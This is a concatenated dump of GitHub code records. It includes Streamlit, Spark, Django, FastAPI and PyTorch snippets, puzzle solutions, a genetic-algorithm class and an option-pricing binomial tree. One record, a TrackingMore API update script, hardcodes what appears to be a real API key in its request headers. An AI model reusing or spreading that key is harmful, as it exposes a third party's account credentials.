st.sidebar.button('Delete Project', use_container_width=True)\nif delete_button:\n db.delete_from_project(project_name=project_name)\n st.experimental_rerun()\n\nif st.button('Write'):\n with open('scripts/agent.py', 'w') as f:\n f.write(agent_code)\n with open('scripts/model.py', 'w') as f:\n f.write(model_code)\n with open('scripts/utils.py', 'w') as f:\n f.write(utils_code)","repo_name":"robsca/stock_s","sub_path":"pages/Editor.py","file_name":"Editor.py","file_ext":"py","file_size_in_byte":3712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35840705860","text":"__doc__ = \"\"\"\nKeeps track of 
inventory.\n\"\"\"\n\nimport os\nimport pandas as pd\nfrom alexandria.dewey import HEADERS, INDICES\n\n\nclass MobiusChair(object):\n _chair_stats_ = {}\n\n def __init__(self, *args, **kwargs):\n self.df = None # so del works\n self.inv_path = os.path.join(\n os.path.dirname(__file__),\n 'storage',\n 'inventory.csv'\n )\n in_use = self._chair_stats_.get('inUse', False)\n if in_use:\n raise Exception('Only one MobiusChair can exist at a time!')\n self._chair_stats_['inUse'] = True\n if os.path.exists(self.inv_path):\n self.df = pd.read_csv(self.inv_path)\n else:\n self.df = pd.DataFrame(columns=HEADERS)\n self.df.set_index(INDICES, inplace=True)\n\n def __del__(self):\n if self.df is None:\n return\n self.df.to_csv(self.inv_path)\n\n def _add_df(self, df, subtract=False):\n d = df.reset_index().to_dict()\n for v in d.values():\n self._add_dict(self, d, subtract)\n\n def _add_dict(self, data, subtract=False):\n try:\n key = [data[k] for k in INDICES]\n copies = -data['Copies'] if subtract else data['Copies']\n self.df.loc[key]['Copies'] += copies\n except:\n self.df.append(data)\n","repo_name":"Terrorbear/comican","sub_path":"mobius.py","file_name":"mobius.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32701497482","text":"import os\nfrom datetime import datetime as dt\nimport time\nimport json\n\nfrom json2args import get_parameter\nimport numpy as np\n\nfrom tool_lib import init_cluster, parse_data, get_results\n\n# parse parameters\nkwargs = get_parameter()\n\n# check if a toolname was set in env\ntoolname = os.environ.get('TOOL_RUN', 'cluster').lower()\n\n# switch the tool\nif toolname == 'cluster':\n # get the parameter\n try:\n data = parse_data(kwargs['data'])\n except Exception as e:\n print(str(e))\n raise e\n \n # initialize the cluster instance\n try:\n cl = init_cluster(\n method=kwargs['method'],\n n_clusters=kwargs.get('n_clusters'),\n random_state=kwargs.get('random_state', 42),\n **kwargs.get('init_args', {})\n )\n except KeyError as e:\n print(\"Mandatory data is missing, please check the Tool specification.\")\n raise e\n\n # run the Algorithm\n t1 = time.time()\n cl.fit(data)\n t2 = time.time()\n print(f\"Clustering took {t2 - t1} seconds\")\n\n # get results\n labels, centers = get_results(cl, data)\n\n # save the results\n np.savetxt('/out/labels.dat', labels, fmt=\"%d\")\n np.savetxt('/out/cluster_centers.dat', centers)\n with open('/out/clustering.json', 'w') as f:\n json.dump(dict(labels=labels, centers=centers), indent=4)\n\n\n# In any other case, it was not clear which tool to run\nelse:\n raise AttributeError(f\"[{dt.now().isocalendar()}] Either no TOOL_RUN environment variable available, or '{toolname}' is not valid.\\n\")\n","repo_name":"VForWaTer/tool_clustering","sub_path":"src/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20071167322","text":"# Databricks notebook source\nfrom pyspark.sql import *\nfrom pyspark import SparkContext\n# from pyspark.context import SparkContext\n# from pyspark.sql.session import SparkSession\n# sc = SparkContext.getOrCreate()\n# spark = SparkSession(sc)\n\n# Create Example Data - Departments and Employees\n\n# Create the Departments\ndepartment1 = Row(id='123456', name='Computer Science')\ndepartment2 = Row(id='789012', name='Mechanical Engineering')\ndepartment3 = Row(id='345678', 
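In the clustering `run.py` above, `json.dump(dict(labels=labels, centers=centers), indent=4)` never receives the open file handle `f`, and NumPy arrays are not JSON-serializable, so the `with open(...)` block raises either way. A hedged fix, assuming `get_results` returns NumPy arrays (the stand-in values below are illustrative):

```python
import json
import numpy as np

labels = np.array([0, 1, 1, 0])               # stand-in for get_results(...) output
centers = np.array([[0.1, 0.2], [0.9, 0.8]])  # stand-in cluster centers

with open('/out/clustering.json', 'w') as f:
    # Pass the file object, and convert ndarrays to plain lists first.
    json.dump({"labels": labels.tolist(), "centers": centers.tolist()}, f, indent=4)
```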
name='Theater and Drama')\ndepartment4 = Row(id='901234', name='Indoor Recreation')\n\n# Create the Employees\nEmployee = Row(\"firstName\", \"lastName\", \"email\", \"salary\")\nemployee1 = Employee('michael', 'armbrust', 'no-reply@berkeley.edu', 100000)\nemployee2 = Employee('xiangrui', 'meng', 'no-reply@stanford.edu', 120000)\nemployee3 = Employee('matei', None, 'no-reply@waterloo.edu', 140000)\nemployee4 = Employee(None, 'wendell', 'no-reply@berkeley.edu', 160000)\n\n# Create the DepartmentWithEmployees instances from Departments and Employees\ndepartmentWithEmployees1 = Row(department=department1, employees=[employee1, employee2])\ndepartmentWithEmployees2 = Row(department=department2, employees=[employee3, employee4])\ndepartmentWithEmployees3 = Row(department=department3, employees=[employee1, employee4])\ndepartmentWithEmployees4 = Row(department=department4, employees=[employee2, employee3])\n\nprint (department1)\nprint (employee2)\nprint (departmentWithEmployees1.employees[0].email)\n\n# COMMAND ----------\n\nfrom pyspark.sql import *\n\n# Create Example Data - Departments and Employees\n\n\n\ndepartmentsWithEmployeesSeq1 = [departmentWithEmployees1, departmentWithEmployees2]\ndf1 = spark.createDataFrame(departmentsWithEmployeesSeq1)\n\ndisplay(df1)\n\ndepartmentsWithEmployeesSeq2 = [departmentWithEmployees3, departmentWithEmployees4]\ndf2 = spark.createDataFrame(departmentsWithEmployeesSeq2)\n\ndisplay(df2)\n\n\n","repo_name":"ranga11/GoogleCloudPlatform","sub_path":"sparkdftest.py","file_name":"sparkdftest.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29370457032","text":"# WAP to print the numbers from userdefined n to 0 using recursion\n\ninp = int(input(\"Enter n: \"))\n\n# def rec(n):\n# j = n\n# arr = []\n# for i in range(0, j+1):\n# arr.append(i)\n# arr.reverse()\n# for i in arr:\n# print(i)\n\ndef rec(n):\n print(n)\n n-=1\n if(n==-1):\n return\n rec(n)\n\nrec(inp)","repo_name":"JohnJoseph2007/python","sub_path":"Python/Problem Statements/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37446296914","text":"from django.urls import path\n\nfrom .views import ViewPageView, HomePageView, DashboardPageView\n\n\nurlpatterns = [\n path(\"view/\", ViewPageView.as_view(), name=\"view\"),\n path(\"\", HomePageView.as_view(), name=\"home\"),\n path(\"dashboard/\", DashboardPageView.as_view(), name=\"dashboard\"),\n]","repo_name":"DevGameDev/forecasTS","sub_path":"data_sort/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5458665052","text":"from anytree import Node, RenderTree, findall, Walker\n\n\nclass DefaultNodeDict(dict):\n def __missing__(self, key):\n res = self[key] = Node(key)\n return res\n\n\nif __name__ == \"__main__\":\n\n # with open(\"example_1\") as f:\n with open(\"input_1\") as f:\n input_m = [line.rstrip() for line in f]\n\n # print(f\"input {input_m}\")\n\n nodes = DefaultNodeDict()\n\n for input_orbit in input_m:\n center, satellite = input_orbit.split(\")\")\n nodes[satellite].parent = nodes[center]\n\n print(RenderTree(nodes[\"COM\"]))\n w = Walker()\n # upward, common, downward = w.walk(nodes[\"YOU\"], nodes[\"SAN\"])\n # print(len(upward) + len(downward) - 2)\n\n # Part 1 
below ###\n total = 0\n for node in nodes.values():\n upward, common, downward = w.walk(node, nodes[\"COM\"])\n total += len(upward) + len(downward)\n print(total - len(nodes))\n","repo_name":"jgaye/advent_of_code_2019","sub_path":"day_6/day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42577057657","text":"# QUESTION URL = https://www.hackerrank.com/challenges/max-array-sum/problem?h_l=interview&playlist_slugs%5B%5D%5B%5D=interview-preparation-kit&playlist_slugs%5B%5D%5B%5D=dynamic-programming\r\n\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\ndef maxSubsetSum(arr):\r\n dp = []\r\n dp.append(arr[0])\r\n dp.append(max(arr[:2]))\r\n ans = max(dp)\r\n for a in arr[2:]:\r\n dp.append(max(max(dp[-2]+a, a), ans))\r\n ans = max(ans, dp[-1])\r\n return ans\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n n = int(input())\r\n\r\n arr = list(map(int, input().rstrip().split()))\r\n\r\n res = maxSubsetSum(arr)\r\n\r\n fptr.write(str(res) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"TARMAH/HACKER-RANK","sub_path":"Interview Preparation Kit/Dynamic Programming/Max Array Sum.py","file_name":"Max Array Sum.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19162302399","text":"__author__ = 'harishrohini'\nfrom Instructions import Instructions\nfrom src.Registers import Registers\nfrom src.Memory import Memory\n\n\nclass ReadContents:\n def __init__(self):\n self.instructions = Instructions()\n #self.registers = Registers()\n #self.memory = Memory()\n\n def read_iregisters(self, data):\n registers_data = data[data.find('I-REGISTERS')+len('I-REGISTERS')+1:data.find('FP-REGISTERS')].splitlines()\n #print registers_data\n for index in registers_data:\n regs = index.split()\n #print regs\n Registers.r[regs[0]]['contents'] = regs[1]\n #print self.registers.r\n\n def read_fpregisters(self, data):\n registers_data = data[data.find('FP-REGISTERS')+len('FP-REGISTERS')+1:data.find('MEMORY')].splitlines()\n for index in registers_data:\n regs = index.split()\n #print regs\n Registers.f[regs[0]]['contents'] = regs[1]\n #print self.registers.f\n\n def read_memory(self, data):\n memory_data = data[data.find('MEMORY')+len('MEMORY')+1:data.find('CODE')].splitlines()\n #print \"em\", memory_data\n for index in memory_data:\n regs = index.split()\n #print regs\n Memory.location[regs[0]] = regs[1]\n #print self.memory.location\n\n def get_instructions(self, data):\n start = data.find('CODE')\n code = data[start+5:]\n self.instructions.instructions = code.splitlines()\n #self.instructions.memory = self.memory\n #self.instructions.registers = self.registers\n #print self.instructions\n\n def return_attrs(self):\n #print \"id : \", id(self.instructions)\n return self.instructions#, self.registers, self.memory\n\nif __name__ == '__main__':\n a = ReadContents()\n f = open('input.txt', 'r')\n contents = f.read()\n a.read_iregisters(contents)\n a.read_fpregisters(contents)\n a.read_memory(contents)","repo_name":"HarishRohini/eecs645","sub_path":"ReadContents.py","file_name":"ReadContents.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"532564792","text":"import random\nfrom genetic import 
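The `maxSubsetSum` record above (max sum of non-adjacent elements) keeps the whole `dp` list, but each step only reads `dp[-2]` and the running best. A hedged O(1)-space sketch of the same recurrence, mirroring the record's convention that a single negative element yields a negative answer:

```python
def max_subset_sum(arr):
    """Max sum of non-adjacent elements, constant extra space.

    Same recurrence as the record's dp list: at each element keep the best
    sum ending there (prev2 + a, or a alone) and the best seen so far.
    """
    prev2 = arr[0]
    prev1 = max(arr[0], arr[1]) if len(arr) > 1 else arr[0]
    best = max(prev2, prev1)
    for a in arr[2:]:
        cur = max(prev2 + a, a, best)
        best = max(best, cur)
        prev2, prev1 = prev1, cur
    return best

print(max_subset_sum([3, 7, 4, 6, 5]))  # 13 (7 + 6)
```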
*\r\n\r\nclass Chromosome:\r\n\r\n #constructor\r\n def __init__(self):\r\n self.chromosomeSize = 8\r\n self.geneSize = 4\r\n self.dnArray = []\r\n self.fitness = 0\r\n self.probability = 0\r\n #geneSize * chromosomeSize because there are geneSize # of bits\r\n #and chromosomeSize # of genes in a Chromosome\r\n for x in range(0, self.geneSize * self.chromosomeSize):\r\n self.dnArray.append(0)\r\n self.randomizeGenes()\r\n self.translate()\r\n\r\n #randomize all genes in the dnArray string\r\n def randomizeGenes(self):\r\n for x in range(0 , self.geneSize * self.chromosomeSize):\r\n gene = random.randrange(0, 2)\r\n self.dnArray[x] = gene\r\n\r\n\r\n '''\r\n function RECEIVES a chromosome\r\n and RETURNS a chromosome with updated arithmeticArray\r\n '''\r\n def translate(self):\r\n self.arithmeticArray = []\r\n bitString = \"\"\r\n for x in range(0, self.chromosomeSize):\r\n #x counts genes\r\n for y in range(0, self.geneSize):\r\n #y counts bits in a gene; gene x starts at offset x * geneSize\r\n bitString += str(self.dnArray[x * self.geneSize + y])\r\n\r\n #after finished with a single gene, translate with bitsToArithmetic\r\n #and transfer to the arithmeticArray\r\n self.arithmeticArray.append(bitsToArithmetic(bitString))\r\n #reset bitString so we don't get huge strings of bits :)\r\n bitString = \"\"\r\n\r\n\r\n def computeSum(self):\r\n realExpressionArray = toRealExpression(self.arithmeticArray)\r\n if(realExpressionArray[0] == 'n/a'):\r\n return -1\r\n sum = float(realExpressionArray[0])\r\n counter = 1\r\n while(counter < len(realExpressionArray)):\r\n if(realExpressionArray[counter] == '+'):\r\n sum += float(realExpressionArray[counter+1])\r\n if(realExpressionArray[counter] == '-'):\r\n sum -= float(realExpressionArray[counter+1])\r\n if(realExpressionArray[counter] == '*'):\r\n sum *= float(realExpressionArray[counter+1])\r\n if(realExpressionArray[counter] == '/'):\r\n sum /= float(realExpressionArray[counter+1])\r\n counter += 2\r\n\r\n return sum\r\n\r\n def updateFitness(self, targetNum):\r\n #if the denominator isn't 0...\r\n if( abs(targetNum - self.computeSum()) == 0 ):\r\n #throw a flag here! Found a solution\r\n self.fitness = 0\r\n else:\r\n self.fitness = 1 / abs(targetNum - self.computeSum())\r\n\r\n def recombinate(self, otherChromosome):\r\n bitPick = random.randrange(0, self.geneSize*self.chromosomeSize)\r\n for x in range(bitPick, self.geneSize*self.chromosomeSize):\r\n #swap everything past the bitPick point\r\n temp = self.dnArray[x]\r\n self.dnArray[x] = otherChromosome.dnArray[x]\r\n otherChromosome.dnArray[x] = temp\r\n self.translate()\r\n otherChromosome.translate()\r\n\r\n def mutate(self, mutationRate):\r\n for x in range(0, self.geneSize * self.chromosomeSize):\r\n gamble = random.random()\r\n if(gamble < mutationRate):\r\n #flip with 1 - bit (not `not`) so the bit stays an int and\r\n #translate() keeps emitting '0'/'1' instead of 'True'/'False'\r\n self.dnArray[x] = 1 - self.dnArray[x]\r\n\r\n #this probability ONLY is calculated in the context of a generation\r\n #the sumSoFar provides boundaries for the pick (essentially defining pie chart)\r\n #This will probably cause issues with [n/a] strings... 
how to fix?\n def updateProbability(self, totalFitness, sumSoFar):\n if(toRealExpression(self.arithmeticArray) == 'n/a'):\n self.probability = 0\n return\n self.probability = self.fitness/totalFitness\n","repo_name":"tiny-crab/pygenetic","sub_path":"chromosome.py","file_name":"chromosome.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34810279878","text":"import requests\n\nurl = \"https://api.trackingmore.com/v4/trackings/update/9a7ef5e14d6fcb28c7872fbf2d99caeb\"\n\npayload = {\n # \"tracking_destination_country\": \"eg\",\n # \"tracking_origin_country\": \"us\",\n \"title\": \"Welcome Testing Track\"\n}\nheaders = {\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json\",\n \"Tracking-Api-Key\": \"2cknap14-rgef-aooz-twdh-uaqs44kjm5hd\"\n}\n\nresponse = requests.put(url, json=payload, headers=headers)\n\nprint(response.json())","repo_name":"3b3z-himself/TrackingMore","sub_path":"update_tracking.py","file_name":"update_tracking.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27732779547","text":"import unittest\n\nfrom nlp import nlp\n\n\nclass TestNbCharacters(unittest.TestCase):\n\n def test_simple(self):\n text = 'wilfried'\n self.assertEqual(nlp.nbCharacters(text), 8)\n\n def test_avec_ponctuation(self):\n text = \"Vas-tu à l'hopital?\"\n self.assertEqual(nlp.nbCharacters(text), 19)\n\nclass TestNbWords(unittest.TestCase):\n\n def test_simple(self):\n text = 'Tous les hommes sont mortels'\n # ['Tous', 'les', 'hommes', 'sont', 'mortels']\n self.assertEqual(nlp.nbWords(text), 5)\n\n def test_avec_ponctuation_simple(self):\n text = 'Tous les hommes sont mortels.'\n # ['Tous', 'les', 'hommes', 'sont', 'mortels']\n self.assertEqual(nlp.nbWords(text), 5)\n\n def test_avec_ponctuation(self):\n text = \"Vas-tu à l'hopital?\"\n # ['Vas', 'tu', 'à', 'l', 'hopital']\n self.assertEqual(nlp.nbWords(text), 5)\n\n\nclass TestOccurences(unittest.TestCase):\n\n def test_un(self):\n text = 'Tous les hommes sont mortels'\n expected_output = {\n 'tous': 1,\n 'les': 1,\n 'hommes': 1,\n 'sont': 1,\n 'mortels': 1,\n }\n self.assertEqual(nlp.occurrences(text), expected_output)\n\n def test_deux(self):\n text = 'ho ho, la la la la le le le'\n expected_output = {\n 'ho': 2,\n 'la': 4,\n 'le': 3,\n }\n self.assertEqual(nlp.occurrences(text), expected_output)\n\n\nclass TestExtractKeyWords(unittest.TestCase):\n\n def test_simple(self):\n text = \"\"\"\n La France est un pays attachant avec de magnifiques monuments et une savoureuse gastronomie. \n C'est pourquoi parler français lors de ses voyages ou pour nouer des relations professionnelles demeure un vrai plus !\n En France, il y a au total 11 fêtes pendant l’année. Ce sont des jours fériés, c’est-à-dire des jours pendant lesquels on\n ne travaille pas. Certaines fêtes sont civiles et d’autre sont d’origine religieuses. Voici les principales. Le jour de l’An\n correspond au 1 janvier. On le fête avec ses amis ou sa famille, et on souhaite « bonne année ! » à ses proches. Le 14 juillet\n est la fête nationale française. Elle célèbre la prise de la Bastille qui a eu lieu le 14 juillet 1789. Des feux d’artifices \n et des défilés militaires sont organisés. Le 8 mai est la fête de la Victoire. C’est la commémoration, c’est-à-dire la fête \n anniversaire, de la fin de la Seconde Guerre mondiale. 
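Two notes on the genetic-algorithm record above. First, the author's own "how to fix?" question: `toRealExpression(...)` returns a list, so comparing it to the string `'n/a'` is always False; checking the first element, as `computeSum` does, answers it. Second, `updateProbability` computes selection probabilities that nothing in the class consumes; the usual consumer is roulette-wheel selection. A self-contained sketch (the population and fitness values below are illustrative):

```python
import random

def roulette_select(population, fitnesses):
    """Pick one individual with probability proportional to its fitness."""
    total = sum(fitnesses)
    pick = random.uniform(0, total)
    acc = 0.0
    for individual, fitness in zip(population, fitnesses):
        acc += fitness
        if acc >= pick:
            return individual
    return population[-1]   # guard against floating-point round-off

parents = [roulette_select(["a", "b", "c"], [0.2, 0.5, 0.3]) for _ in range(4)]
```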
Le 1er mai correspond à la fête du Travail, et rappelle la lutte des\n        ouvriers pour réduire la journée de travail à huit heures. Ce jour-là, on offre traditionnellement du muguet, une petite \n        fleur blanche, à ses proches. Noël a lieu le 25 décembre. C’est une fête chrétienne qui célèbre la naissance de Jésus.\n        \"\"\"\n        expected_output = [\n            {'keyword': 'france', 'relevance': 0.06258802836742607},\n            {'keyword': 'fête', 'relevance': 0.0709559128934118},\n            {'keyword': 'gastronomie', 'relevance': 0.16601451526587843},\n            {'keyword': 'pays', 'relevance': 0.1846637908731856}\n        ]\n\n        self.assertEqual(nlp.extractKeywords(text, nb_keywords=4), expected_output)\n","repo_name":"wilcoln/tai-interview-solution","sub_path":"server/nlp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30616128678","text":"from typing import Tuple\nimport torch.nn as nn\nimport torch\n\n\n\nclass FFN(nn.Module):\n\n    def __init__(self, input_dim: int, output_dim: int, hidden_dims: Tuple[int, ...]):\n        super().__init__()\n\n        blocks = []\n        input_dim_block = input_dim\n        for hidden_dim in hidden_dims:\n            blocks.append(nn.Linear(input_dim_block, hidden_dim))\n            blocks.append(nn.PReLU())\n            input_dim_block = hidden_dim\n        blocks.append(nn.Linear(input_dim_block, output_dim))\n        self.network = nn.Sequential(*blocks)\n        self.output_dim = output_dim\n\n    def forward(self, *args):\n        x = torch.cat(args, -1)\n        out = self.network(x)\n        return out\n\n\n\n","repo_name":"SigCGANs/Sig-Wasserstein-GANs","sub_path":"lib/networks/ffn.py","file_name":"ffn.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"14701690597","text":"import os\n\nfrom setuptools import setup\n\nversion = \"1.0.0dev\"\n\nDEVEL_REQUIREMENTS = [\n    \"autoflake==1.3\",\n    \"black==20.8b1\",\n    \"isort==4.3.21\",\n    \"jinja2\",\n    \"pre-commit==2.9.3\",\n    \"pylint==2.6.0\",\n    \"pytest\",\n]\n\nEXTRAS_REQUIREMENTS = {\"devel\": DEVEL_REQUIREMENTS}\n\n\ndef get_long_description():\n    description = \"\"\n    try:\n        with open(\n            os.path.join(os.path.dirname(os.path.realpath(__file__)), \"README.md\"),\n            encoding=\"utf-8\",\n        ) as file:\n            description = file.read()\n    except FileNotFoundError:\n        pass\n    return description\n\n\ndef do_setup():\n    setup(\n        version=version,\n        extras_require=EXTRAS_REQUIREMENTS,\n    )\n\n\nif __name__ == \"__main__\":\n    do_setup()\n","repo_name":"politools/dag-checks","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"8149563407","text":"import numpy as np\n\ndef Binomial_Tree_Bonus1(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t):\n    delta_t = T_minus_t / n\n    T = T_minus_t + t\n    u = np.exp(sigma * (delta_t ** 0.5))\n    d = 1 / u\n    p = (np.exp((r - q) * delta_t) - d) / (u - d)\n\n    # Step 1 & Step 2\n    A = np.zeros((n + 1, n + 1, M + 1))\n    eur_C = np.zeros((n + 1, n + 1, M + 1))  # European call\n    ame_C = np.zeros((n + 1, n + 1, M + 1))  # American call\n    for i in range(n + 1):\n        for j in range(i + 1):\n            A_max = (S_ave_t * (t * n / T_minus_t + 1) + (S_t * u) * (1 - u ** (i - j)) / (1 - u) + (S_t * (u ** (i - j)) * d) * (1 - d ** j) / (1 - d)) / (i + t * n / T_minus_t + 1)\n
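            # A_max / A_min are the largest and smallest running averages attainable at\n            # node (i, j): all up-moves first vs. all down-moves first. The M+1\n            # representative averages per node are spaced logarithmically between them.\n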
            A_min = (S_ave_t * (t * n / T_minus_t + 1) + (S_t * d) * (1 - d ** j) / (1 - d) + (S_t * u * d ** j) * (1 - u ** (i - j)) / (1 - u)) / (i + t * n / T_minus_t + 1)\n            for k in range(M + 1):\n                A[i][j][k] = np.exp(((M - k) / M) * np.log(A_max) + (k / M) * np.log(A_min))\n\n    # Step 3\n    for j in range(n + 1):\n        for k in range(M + 1):\n            eur_C[n][j][k] = max(A[n][j][k] - K, 0)\n            ame_C[n][j][k] = max(A[n][j][k] - K, 0)\n\n    # Step 4\n    for i in range(n - 1, -1, -1):\n        for j in range(i + 1):\n            for k in range(M + 1):\n                A_u = (A[i][j][k] * (i + t * n / T_minus_t + 1) + S_t * (u ** (i + 1 - j)) * (d ** j)) / (i + t * n / T_minus_t + 2)\n                if A[i + 1][j][0] == A[i + 1][j][M]:  # topmost or bottommost node\n                    eur_C_u = eur_C[i + 1][j][0]\n                    ame_C_u = ame_C[i + 1][j][0]\n                elif A[i + 1][j][M] > A_u:  # same as the last entry\n                    eur_C_u = eur_C[i + 1][j][M]\n                    ame_C_u = ame_C[i + 1][j][M]\n                else:\n                    k_u = list(A[i + 1][j]).index(A[i + 1][j][A[i + 1][j] <= A_u][0])\n                    w_u = (A[i + 1][j][k_u - 1] - A_u) / (A[i + 1][j][k_u - 1] - A[i + 1][j][k_u])\n                    eur_C_u = w_u * eur_C[i + 1][j][k_u] + (1 - w_u) * eur_C[i + 1][j][k_u - 1]\n                    ame_C_u = w_u * ame_C[i + 1][j][k_u] + (1 - w_u) * ame_C[i + 1][j][k_u - 1]\n\n                A_d = (A[i][j][k] * (i + t * n / T_minus_t + 1) + S_t * (u ** (i - j)) * (d ** (j + 1))) / (i + t * n / T_minus_t + 2)\n                if A[i + 1][j + 1][0] == A[i + 1][j + 1][M]:\n                    eur_C_d = eur_C[i + 1][j + 1][0]\n                    ame_C_d = ame_C[i + 1][j + 1][0]\n                elif A[i + 1][j + 1][M] > A_d:\n                    eur_C_d = eur_C[i + 1][j + 1][M]\n                    ame_C_d = ame_C[i + 1][j + 1][M]\n                else:\n                    k_d = list(A[i + 1][j + 1]).index(A[i + 1][j + 1][A[i + 1][j + 1] <= A_d][0])\n                    w_d = (A[i + 1][j + 1][k_d - 1] - A_d) / (A[i + 1][j + 1][k_d - 1] - A[i + 1][j + 1][k_d])\n                    eur_C_d = w_d * eur_C[i + 1][j + 1][k_d] + (1 - w_d) * eur_C[i + 1][j + 1][k_d - 1]\n                    ame_C_d = w_d * ame_C[i + 1][j + 1][k_d] + (1 - w_d) * ame_C[i + 1][j + 1][k_d - 1]\n                eur_C[i][j][k] = (p * eur_C_u + (1 - p) * eur_C_d) * np.exp(-r * delta_t)\n                ame_C[i][j][k] = max(A[i][j][k] - K, (p * ame_C_u + (1 - p) * ame_C_d) * np.exp(-r * delta_t))\n\n    return eur_C[0][0][0], ame_C[0][0][0]\n\nif __name__ == '__main__':\n    import time\n    import pandas as pd\n    from Bonus2 import Binomial_Tree_Interpolation\n\n    S_t = 50\n    K = 50\n    r = 0.1\n    q = 0.05\n    sigma = 0.8\n    t = 0.25\n    T_minus_t = 0.25  # T = 0.5\n    Ms = [50]\n    n = 100\n    S_ave_t = 50\n\n    # Bonus 1\n    print(\"Bonus 1\")\n    result = []\n    for M in Ms:\n        t9 = time.time()\n        # price each tree once and unpack both values instead of pricing twice\n        linearly_eur, linearly_ame = Binomial_Tree_Interpolation(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t)\n        linearly_eur, linearly_ame = round(linearly_eur, 4), round(linearly_ame, 4)\n        t10 = time.time()\n        print(\"Finish linearly M = {}, Spend Time: {}\".format(M, round(t10 - t9, 6)))\n        logarithmically_eur, logarithmically_ame = Binomial_Tree_Bonus1(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t)\n        logarithmically_eur, logarithmically_ame = round(logarithmically_eur, 4), round(logarithmically_ame, 4)\n        t11 = time.time()\n        print(\"Finish logarithmically M = {}, Spend Time: {}\".format(M, round(t11 - t10, 6)))\n        result.append([linearly_eur, logarithmically_eur, linearly_ame, logarithmically_ame])\n\n    # print the results\n    comparison = pd.DataFrame(result).T\n    comparison.index = [\"European(linearly)\", \"European(logarithmically)\", \"American(linearly)\", \"American(logarithmically)\"]\n    comparison.columns = [\"M = {}\".format(M) for M in Ms]\n    print(comparison)\n\n","repo_name":"mic-tu/109-2_FInancial_Computation","sub_path":"Homework5/Bonus1.py","file_name":"Bonus1.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31123094148","text":"
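# FastAPI backend serving pre-aggregated VTuber channel statistics as JSON\n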
import json\n\nfrom fastapi import FastAPI\n\n\napp = FastAPI()\n\n\njsondataChannel = open('../data/channels.json', encoding=\"utf8\")\nchannel = json.load(jsondataChannel)\njsondataSuperchat = open('../data/superchat_stats.json', encoding=\"utf8\")\nsuperchat = json.load(jsondataSuperchat)\njsondataChatStats = open('../data/chat_stats.json', encoding=\"utf8\")\nchat_stats = json.load(jsondataChatStats)\n\n\n# filter so that only Hololive talents are shown\ndef hololiveFilter(talent):\n    return talent['affiliation'] == \"Hololive\"\n\n\nhololiveTalent = list(filter(hololiveFilter, channel))\n\n# sort by subscriber count, highest first\nsortedsubs = sorted(hololiveTalent, key=lambda x: x['subscriptionCount'], reverse=True)\n\nsorted_video_count = sorted(hololiveTalent, key=lambda x: x['videoCount'], reverse=True)\n\n# sorted_livechart\n\n# remove the official hololive channel from the ranking\nsortedsubs = [item for item in sortedsubs if item[\"channelId\"] != \"UCJFZiqLMntJufDCHc6bQixg\"]\n\n\n# =============================================\nchat_counts = {}\ndef add_chat(data):\n    channelId = data[\"channelId\"]\n    chats = data[\"chats\"]\n    if channelId in chat_counts:\n        chat_counts[channelId] += chats\n    else:\n        chat_counts[channelId] = chats\nfor data in chat_stats:\n    add_chat(data)\n\njumlahchat = []\nfor item in chat_counts:\n    temp = {}\n    temp[\"channelId\"] = item\n    temp[\"valuechat\"] = chat_counts[item]\n    jumlahchat.append(temp)\n\nchannelvidcout = []\nfor item1 in hololiveTalent:\n    for item2 in jumlahchat:\n        if item1['channelId'] == item2['channelId']:\n            item2.update(item1)\n            channelvidcout.append(item2)\nsortedchat = sorted(channelvidcout, key=lambda x: x['valuechat'], reverse=True)\n\n################################################\nban_counts = {}\ndef add_ban(databan):\n    channelId = databan[\"channelId\"]\n    banned = databan[\"bannedChatters\"]\n    if channelId in ban_counts:\n        ban_counts[channelId] += banned\n    else:\n        ban_counts[channelId] = banned\nfor data in chat_stats:\n    add_ban(data)\n\njumlahban = []\nfor item in 